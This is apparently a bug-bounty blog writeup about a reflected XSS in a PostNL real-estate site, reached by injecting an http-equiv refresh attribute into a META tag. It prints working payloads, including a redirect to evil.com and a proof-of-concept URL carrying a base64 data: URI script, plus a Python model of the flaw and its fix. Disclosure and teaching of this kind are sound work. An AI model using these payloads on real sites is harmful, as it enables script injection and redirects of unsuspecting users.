XSS bypass using META tag in realestate.postnl.nl
Hi readers,
Today I will write about an XSS vulnerability I reported to the postnl.nl bug bounty program.
Vulnerable endpoint: http://realestate.postnl.nl/?Lang=
To test for a normal reflected XSS I input "><xsstest> in the Lang parameter, and in the source it was reflected unchanged inside a META tag, like below:
<meta name="language" content=""><xsstest>" />
Looks simple, right? Then wait a little :'). Next I inputted "><img src=x>, and this time the img tag did not get through.
After trying many HTML tags I had two observations:
- No valid HTML tag is allowed through.
- I can add arbitrary attributes to the META tag, because the double quote that closes the content value is reflected without encoding.
So I googled meta tag attributes, and the http-equiv attribute caught my attention. Reading more about it, I learned that:
The META tag has an http-equiv attribute, which lets HTML define the equivalent of an HTTP response header. One value it accepts is refresh, whose content takes the form seconds;URL and makes the browser navigate to that URL after the given delay, so it can be used to redirect a user to another page.
Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and the response was:
<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />
That turns the meta tag into a refresh to an attacker-controlled URL. To get script execution rather than just a redirect, the same injection can carry a data: URI with a base64-encoded script tag, which was reflected as:
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />
Now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I get the XSS popup.
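As an added example (not from the original post, and not PostNL's code), the Python below models the whole chain described above: a stand-in filter that strips valid HTML tags but leaves quotes alone (an assumption about the server's behaviour, inferred from the two observations), the reflection into the meta tag, what a browser would make of the resulting attributes, the decoded script carried by the data: URI, and the context-aware fix. The payloads, the base64 blob and the proof-of-concept URL are the ones from this writeup; VALID_TAGS, weak_filter, render_vulnerable, render_fixed, meta_attributes, refresh_target, decode_data_html and lang_from_url are names introduced here, and Python's html.parser stands in for a browser's tolerant tag parsing. One caveat for anyone re-testing this today: current Chrome and Firefox block page-initiated top-level navigations to data: URLs, so the data: step of the chain no longer fires in those browsers, although a refresh to an ordinary http(s) URL still redirects.

```python
import base64
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the server-side filter the writeup describes: tags
# with a valid HTML element name are dropped, but quotes pass through untouched.
# This is an assumption about the original behaviour, not the site's real code.
VALID_TAGS = {"a", "body", "iframe", "img", "input", "script", "style", "svg"}
TAG_RE = re.compile(r"</?([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def weak_filter(value):
    """Drop tags whose name is a real HTML element; keep unknown tags and quotes."""
    return TAG_RE.sub(
        lambda m: "" if m.group(1).lower() in VALID_TAGS else m.group(0), value)


def render_vulnerable(lang):
    """Reflect the Lang value into the meta tag the way the vulnerable page did."""
    return '<meta name="language" content="%s" />' % weak_filter(lang)


def render_fixed(lang):
    """Context-aware fix: HTML-attribute-encode the value, quotes included.

    Allow-listing the expected language codes would be stricter still, but
    encoding alone already prevents breaking out of the content attribute.
    """
    return '<meta name="language" content="%s" />' % html.escape(lang, quote=True)


class _MetaAttrs(HTMLParser):
    """Collect the attributes a browser would see on the first <meta> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "meta" and self.attrs is None:
            self.attrs = dict(attrs)


def meta_attributes(markup):
    """Parse markup with Python's tolerant HTML parser; return the meta attributes."""
    parser = _MetaAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def refresh_target(markup):
    """URL the browser would load if the meta tag is an http-equiv refresh, else None."""
    attrs = meta_attributes(markup)
    if (attrs.get("http-equiv") or "").lower() != "refresh":
        return None
    # content is "<seconds>;<url>"; browsers also accept an optional "url=" prefix
    _, _, url = (attrs.get("content") or "").partition(";")
    url = url.strip()
    if url.lower().startswith("url="):
        url = url[4:].strip()
    return url or None


def decode_data_html(url):
    """Decode a data:text/html;base64,... URL into the HTML it carries."""
    prefix = "data:text/html;base64,"
    if not url.startswith(prefix):
        raise ValueError("not a base64-encoded text/html data URL")
    return base64.b64decode(url[len(prefix):]).decode("utf-8")


def lang_from_url(url):
    """Return the decoded Lang query parameter of a proof-of-concept URL."""
    return parse_qs(urlsplit(url).query)["Lang"][0]


# The proof-of-concept URL from the writeup.
POC_URL = ("http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2C"
           "PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D"
           "%22HTTP-EQUIV%3D%22refresh%22")

if __name__ == "__main__":
    lang = lang_from_url(POC_URL)
    vulnerable = render_vulnerable(lang)
    print(vulnerable)
    target = refresh_target(vulnerable)
    print("browser would navigate to:", target)
    print("which carries:", decode_data_html(target))
    fixed = render_fixed(lang)
    print(fixed)
    print("after the fix, refresh target:", refresh_target(fixed))
```

Run it directly to see both renderings. The fix works because encoding the double quote keeps the entire Lang value inside the content attribute, so no http-equiv attribute is ever created; blocklisting tag names never addressed the attribute context at all, which is exactly the gap the payload walked through.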
They again fixed the issue, listed my name on their Hall of Fame page, and also offered to send some goodies 😍😍😍.
Thanks for reading.
Follow me on Twitter.
If you have any queries, ask me on Facebook.